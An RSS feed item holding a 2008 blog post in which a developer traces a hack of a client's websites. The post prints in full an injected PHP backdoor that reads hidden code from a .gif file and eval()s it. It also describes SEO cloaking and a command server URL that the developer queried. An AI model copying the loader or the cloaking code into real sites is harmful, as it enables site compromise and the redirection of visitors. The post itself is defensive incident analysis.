<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>These things are far too hard &#187; hacking attempt</title>
	<atom:link href="http://leadingedgescripts.co.uk/tag/hacking-attempt/feed/" rel="self" type="application/rss+xml" />
	<link>http://leadingedgescripts.co.uk</link>
	<description></description>
	<lastBuildDate>Fri, 16 Oct 2009 09:14:32 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=abc</generator>
		<item>
		<title>On The Hunt For a Hacker &#8211; Part One</title>
		<link>http://leadingedgescripts.co.uk/computer-security/on-the-hunt-for-a-hacker-part-one/</link>
		<comments>http://leadingedgescripts.co.uk/computer-security/on-the-hunt-for-a-hacker-part-one/#comments</comments>
		<pubDate>Sat, 15 Nov 2008 15:18:31 +0000</pubDate>
		<dc:creator>Chris</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[hacking attempt]]></category>

		<guid isPermaLink="false">http://www.leadingedgescripts.co.uk/?p=214</guid>
		<description><![CDATA[One of my clients has recently been hacked, and not knowing who else to turn to asked me to look into the hack, try and sort out the mess and fix the broken websites. So before I start this post I think I should make it clear that I am supporting my client's legacy code, [...]]]></description>
			<content:encoded><![CDATA[<p>One of my clients has recently been hacked, and not knowing who else to turn to asked me to look into the hack, try and sort out the mess and fix the broken websites.</p>
<p>So before I start this post I think I should make it clear that I am supporting my client's legacy code, which was developed by another developer at least 3-4 years ago. My client is aware of the issues with the code and is actively seeking to patch it up.</p>
<p>So anyway, yesterday I got an email from my client at around 3pm showing some rather nasty Google search results with some of his domains listed in them. Naturally I clicked on the links to see what would happen, and sure enough, after being sent to my client's website, I was sent on to some kind of affiliate web page full of pop-ups trying to tell me my machine had a virus and that I should buy the anti-virus software they were selling &#8211; I&#8217;m sure you&#8217;ve all seen the kind of website I&#8217;m talking about.</p>
<p>So obviously this is a bit of an emergency, so I stopped what I was doing and started to investigate. I&#8217;m still not certain how the attack is being implemented since we&#8217;ve not yet managed to discover how the hacker is getting access to the server, hence this being probably the first post in a series, but I&#8217;ll tell you what I know.</p>
<p>About a month ago, my client phoned me up saying he had accidentally clicked on a virus in his email, and it had caused major problems on his PC. He told me he was running anti-virus software and cleaning up his machines. Knowing that my client doesn&#8217;t have the greatest computer skills I thought &#8220;uh oh&#8221; this could be bad.</p>
<p>Shortly after this, maybe a week later, my client phones up because one of his clients' ecommerce websites (he runs a small web development firm) was redirecting visitors to a web page selling anti-virus software! (sound familiar?). So I took a look around the code and discovered that one of the product names in the database had been changed to include some JavaScript which redirected you immediately to this AV affiliate website.</p>
<p>My first thought was oh no, this means the website has been SQL injected, so I looked through the logs and sure enough there were some requests coming from a bot that was trying to SQL inject. Obviously I patched up the SQL injection vulnerability and thought nothing more of the issue.</p>
<p>Then, about 2 weeks later, I get another phone call; the website&#8217;s doing the same thing. So now I know it can&#8217;t be SQL injection, which means the hacker either has root access to the server the website(s) are on (more than one has been affected to date), or that the hacker has FTP access, so I instruct my client to change all his FTP usernames and passwords, which he promptly does, and I fix the issues with the code.</p>
<p>Then about 2 weeks more pass by and I get an email entitled &#8220;Nightmare!!&#8221;, which is kind of where this story begins&#8230;</p>
<p>So, as I mentioned above, I visited the website in my browser &#8211; looks fine, I am able to browse the shop, I&#8217;m not redirected anywhere, but the email from my client has links to this website that definitely redirect to the affiliate website in question. So I type the address into my browser including the full URL from my client&#8217;s email, and sure enough I am redirected to this affiliate website.</p>
<p>The url looked like this:</p>
<blockquote><p>http://www.clientsdomain.com/index.php?id=50000</p></blockquote>
<p>So naturally I checked out index.php, and saw the following code:</p>
<pre>&lt;?
// CheckBrowser() is defined elsewhere in the codebase (see below)
$browser = CheckBrowser();
$link = $browser ? 'index.php?id=50000' : 'about-us.php';
$title = $browser ? 'Blog &lt;font color=#FF0000&gt;(NEW)&lt;/font&gt;' : 'About us';
?&gt;
&lt;td height="26" align="center" class="style51"&gt;&lt;a href="&lt;? echo $link; ?&gt;"&gt;&lt;? echo $title; ?&gt;&lt;/a&gt;&lt;/td&gt;</pre>
<p>Roughly speaking, this code checks the browser, and either displays a link to about-us.php or links to the URL above (index.php?id=50000).</p>
<p>Now, that&#8217;s interesting, so I needed to know what the PHP function CheckBrowser() was doing&#8230; so I had to hunt around the code (all object-oriented code without documentation) and I found the CheckBrowser() function &#8211; it was basically testing to see if the request was being made by GoogleBot, or Yahoo. So to test my theory I used the following great little tool ( <a href="http://www.web-tool.org/cloak-check/cloak-check.asp">http://www.web-tool.org/cloak-check/cloak-check.asp</a> ) in conjunction with <a href="http://bethebot.com">http://bethebot.com</a> and yep, this website was definitely cloaking.</p>
<p>So then I had to figure out how it was redirecting, index.php didn&#8217;t have any code to check for $_GET variables, nor did it include any code to redirect people; strange&#8230;</p>
<p>So I took another good look around the code and found the following bit of PHP:</p>
<pre>if(isset($_REQUEST['id']))
    if(($_REQUEST['id']&gt;=50000)&amp;&amp;($_REQUEST['id']&lt;60000))
    {
        // file path, byte offset and length of the hidden payload
        $fls = array(array('images/product-display-box_19.gif',3696,21894));
        foreach($fls as $v)
        if(file_exists($v[0]))
        {
            $f=fopen($v[0],'rb');
            fseek($f,$v[1],SEEK_SET);   // jump to the offset inside the .gif
            $d=fread($f,$v[2]);         // read the embedded PHP
            fclose($f);
            eval($d);                   // execute it
            megadupa($v[0]);            // defined by the eval'd code, not by PHP
            break;
        }
        die();
    }</pre>
<p>Amusingly, placed immediately preceding my code designed to prevent SQL injection.</p>
<p>Now look at this code, there is a $_GET variable called id, with a value between 50000 and 60000 it opens a file on the server product-display-box_19.gif and reads a specific part of that file and then eval()s whatever it finds (which means it &#8220;runs the code&#8221;). Now a .gif image shouldn&#8217;t be able to be executed, so how does this work? And what the hell is the megadupa() function? That&#8217;s not part of the PHP language, so why isn&#8217;t this falling over saying that it is bad PHP?</p>
<p>So the next port of call was to look at product-display-box_19.gif. I checked out the images/ folder on the server and guess what, there is a 19MB file with that very name. Now 19MB is HUGE for an image file, so I thought I needed to see this.</p>
<p>I downloaded it from the server, and double clicked on it &#8211; I&#8217;m pretty good with PCs so although I knew I might suffer a buffer overflow attack or a trojan, I&#8217;m confident I can handle these things :-)</p>
<p>Well, I loaded up the image and it was a tiny little .gif, it looked like the bottom of a button and would normally be 19 KB in size not 19 MB! Obviously there is something fishy going on here. So I opened the .gif file using Notepad++, took ages of course, but once it had loaded, I scanned through the code and sure enough this .gif file has been specially crafted and contains loads of PHP, XHTML / CSS the lot, in fact it&#8217;s a pretty amazing file.</p>
<p>So I renamed the file to .php and noticing that there were some comments in the embedded PHP instructing me how to run the code without the eval() function stuck it on my local server and voila it loaded! And it didn&#8217;t just load anything, it loaded what looked like clones of WordPress &#8211; two of them, loads of sex related keywords, basically this thing looked like it had been used repeatedly to hack servers. What a find.</p>
<p>So being curious I started to trawl through the code, and guess what, this script &#8220;phones home&#8221;, revealing IP addresses. So I followed them, and ended up on a webserver in the USA, with a message saying that &#8220;the service was unavailable&#8221;, so I referred back to the code, and noticed that when it &#8220;phones home&#8221; it also sends back information about the referrer, domain, IP address etc etc so I constructed a fake URL as follows</p>
<blockquote><p>http://123.123.123.123/gate/gate.php?t=av&amp;s=2&amp;pid=665&amp;uri=www.example.com%2Findex.php&amp;ip=64.22.112.234&amp;ref=&amp;ua=Mozilla%2F5.0+%28compatible%3B+Googlebot%2F2.1%3B+%2Bhttp%3A%2F%2Fwww.google.com%2Fbot.html%29</p></blockquote>
<p>And, I was in!</p>
<p>Suddenly this server in America sends me back a web address, you guessed it, for the affiliate website.</p>
<p>So now I&#8217;m looking at a server which instructs these scripts to point other peoples websites to a URL of the hackers choice! Of course at this stage I whois&#8217;ed the IP address and yes I know who is hosting the IP.</p>
<p>So next up, I do a reverse DNS lookup using <a href="http://www.myipneighbors.com/">http://www.myipneighbors.com/</a> and I find some of the other websites on the server in America. So I visited them, they pretty much all seemed to be spammy fake &#8220;search engines&#8221; but interestingly they linked back to another IP address &#8211; also in America, but on a different host server. So I loaded up the new IP address and was immediately redirected to a domain. I&#8217;m not going to reveal the domain, but this gave me something else to run a whois check on.</p>
<p>So I did, and the domain resolved to someone in Texas, but even more interestingly, it included an email address for the registrant: @mail.ru</p>
<p>So now I&#8217;m looking at a Russian hacker, using a server in America to control what seems to be a number of compromised servers to redirect websites and manipulate search engine results to point to an affiliate website selling anti-virus software.</p>
<p>So, since I still don&#8217;t know how this person got into my client&#8217;s website in the first place, I have instructed him to change his FTP passwords and not to log in again for the time being. I will be contacting the web hosting company and I&#8217;m waiting to see if the hacker gets back in again; if they do I can only presume the web host has been compromised.</p>
<p>Look out for part two&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://leadingedgescripts.co.uk/computer-security/on-the-hunt-for-a-hacker-part-one/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>
